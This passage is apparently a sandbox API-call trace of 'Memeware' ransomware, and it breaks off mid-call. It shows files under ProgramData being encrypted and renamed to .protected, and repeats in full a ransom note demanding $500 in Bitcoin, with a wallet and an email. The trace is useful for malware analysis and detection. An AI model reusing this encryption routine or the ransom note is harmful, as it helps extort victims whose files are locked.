[0074.947] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.protected" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.protected")) returned 1 [0074.948] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0074.948] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0074.948] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package 
Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\RESTORE_FILES.txt") returned 132 [0074.948] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0075.008] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0075.008] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0075.009] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0075.009] WriteFile (in: hFile=0xd4, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0075.009] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0075.009] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0075.009] CloseHandle (hObject=0xd4) returned 1 [0075.010] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0075.010] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0075.010] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\RESTORE_FILES.txt") returned 109 [0075.010] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0075.011] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0075.011] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0075.011] lstrlenA (lpString="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") returned 684 [0075.011] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0075.011] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0075.011] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0075.012] CloseHandle (hObject=0xb4) returned 1 [0075.012] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0075.012] FindClose (in: hFindFile=0x490a28 | out: hFindFile=0x490a28) returned 1 [0075.013] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\RESTORE_FILES.txt") returned 100 [0075.013] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0075.014] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0075.014] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0075.014] lstrlenA (lpString="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") returned 684 [0075.014] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0075.015] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0075.015] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0075.015] CloseHandle (hObject=0xa4) returned 1 [0075.015] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0075.015] lstrcmpiW (lpString1="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpString2="Windows") returned -1 [0075.015] lstrcmpiW (lpString1="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpString2="Program Files") returned -1 [0075.015] lstrcmpiW (lpString1="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpString2="Program Files (x86)") returned -1 [0075.015] lstrcmpiW (lpString1="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpString2="$Recycle.bin") returned 1 [0075.015] lstrcmpiW (lpString1="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpString2="System Volume Information") returned -1 [0075.015] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030") returned 82 [0075.015] lstrcmpW (lpString1="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpString2=".") returned 1 [0075.015] lstrcmpW (lpString1="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpString2="..") returned 1 [0075.015] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*") returned 84 [0075.015] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x490a28 [0075.045] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0075.045] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0075.045] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0075.045] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0075.045] lstrcmpiW (lpString1=".", 
lpString2="System Volume Information") returned -1 [0075.045] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\.") returned 84 [0075.045] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.045] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0075.045] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0075.045] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0075.045] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0075.046] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0075.046] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0075.046] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\..") returned 85 [0075.046] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0075.046] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.046] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0075.046] lstrcmpiW (lpString1="packages", lpString2="Windows") returned -1 [0075.046] lstrcmpiW (lpString1="packages", lpString2="Program Files") returned -1 [0075.046] lstrcmpiW (lpString1="packages", lpString2="Program Files (x86)") returned -1 [0075.046] lstrcmpiW (lpString1="packages", lpString2="$Recycle.bin") returned 1 [0075.046] lstrcmpiW (lpString1="packages", lpString2="System Volume Information") returned -1 [0075.046] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages") returned 91 [0075.046] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0075.046] lstrcmpW 
(lpString1="packages", lpString2="..") returned 1 [0075.046] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*") returned 93 [0075.046] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b7a8 [0075.047] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0075.047] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0075.047] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0075.047] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0075.047] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0075.048] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\.") returned 93 [0075.048] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.048] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0075.048] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0075.048] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0075.048] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0075.048] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0075.048] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0075.048] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\..") returned 94 [0075.048] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0075.048] lstrcmpW (lpString1="..", lpString2="..") returned 0 
[0075.048] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0075.048] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="Windows") returned -1 [0075.048] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="Program Files") returned 1 [0075.048] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="Program Files (x86)") returned 1 [0075.048] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="$Recycle.bin") returned 1 [0075.048] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="System Volume Information") returned 1 [0075.048] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86") returned 115 [0075.048] lstrcmpW (lpString1="vcRuntimeAdditional_x86", lpString2=".") returned 1 [0075.048] lstrcmpW (lpString1="vcRuntimeAdditional_x86", lpString2="..") returned 1 [0075.048] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*") returned 117 [0075.048] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447c80 [0075.050] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0075.050] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0075.050] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0075.050] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0075.050] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0075.050] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\.") returned 117 [0075.050] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.050] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0075.050] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0075.050] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0075.050] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0075.050] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0075.050] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0075.050] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\..") returned 118 [0075.050] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0075.050] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.050] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0075.050] lstrcmpiW (lpString1="cab1.cab", lpString2="Windows") returned -1 [0075.050] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files") returned -1 [0075.050] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files (x86)") returned -1 [0075.050] lstrcmpiW (lpString1="cab1.cab", lpString2="$Recycle.bin") returned 1 [0075.050] lstrcmpiW (lpString1="cab1.cab", lpString2="System Volume Information") returned -1 [0075.050] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned 124 [0075.050] StrStrIW (lpFirst="cab1.cab", lpSrch=".protected") returned 0x0 [0075.050] lstrcmpW (lpString1="cab1.cab", 
lpString2="RESTORE_FILES.txt") returned -1 [0075.050] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0075.050] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0075.050] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0075.051] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned 124 [0075.051] StrStrW (lpFirst="cab1.cab", lpSrch=".txt") returned 0x0 [0075.051] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned 124 [0075.051] StrStrW (lpFirst="cab1.cab", lpSrch=".rar") returned 0x0 [0075.051] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned 124 [0075.051] StrStrW (lpFirst="cab1.cab", lpSrch=".zip") returned 0x0 [0075.051] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0075.066] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.066] WriteFile (in: 
hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0075.079] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.079] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0075.081] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0075.081] CloseHandle (hObject=0xd8) returned 1 [0075.081] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab.protected") returned 134 [0075.081] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab.protected" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab.protected")) returned 1 [0075.082] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0075.082] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="Windows") returned -1 [0075.082] 
lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="Program Files") returned 1 [0075.082] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="Program Files (x86)") returned 1 [0075.082] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="$Recycle.bin") returned 1 [0075.082] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="System Volume Information") returned 1 [0075.082] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned 144 [0075.082] StrStrIW (lpFirst="vc_runtimeAdditional_x86.msi", lpSrch=".protected") returned 0x0 [0075.082] lstrcmpW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="RESTORE_FILES.txt") returned 1 [0075.082] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0075.082] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0075.082] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package 